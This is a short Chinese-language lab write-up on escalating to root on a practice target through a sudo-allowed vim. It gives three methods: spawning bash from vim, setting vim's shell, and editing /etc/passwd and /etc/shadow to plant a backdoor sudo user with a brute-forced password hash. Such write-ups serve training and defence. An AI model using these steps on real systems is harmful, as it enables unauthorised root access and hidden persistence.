利用vim进行sudo逃逸

实验背景

拿到靶机普通用户shell，普通用户存在NOPASSWD：sudo vim 权限。

实验目的

利用vim代码功能拿到靶机root权限

实验步骤

方法一

通过sudo vim 进入vim二进制文件

#执行外部代码

!bash

#拿到root权限

方法二

使用vim通过给set shell附上bash的进程路径

#bash

set shell=/usr/bin/bash

shell

#拿到root权限

方法三

使用vim通过e 修改passwd与shadow文件 增加一个拥有sudo权限的用户

#bash

e etc/passwd #添加一个新用户并将其加入sudo组为攻击者留下后门

passwd jack #修改jack用户的密码（已经通过爆破得到），记得保存一份jack用户的密码原哈希，之后确保还原。

e etc/shadow #为新用户添加jack修改过的密码哈希（因为是自己修改的所以知道密码）就能使用自己的密码使用sudo提权。

#拿到root权限。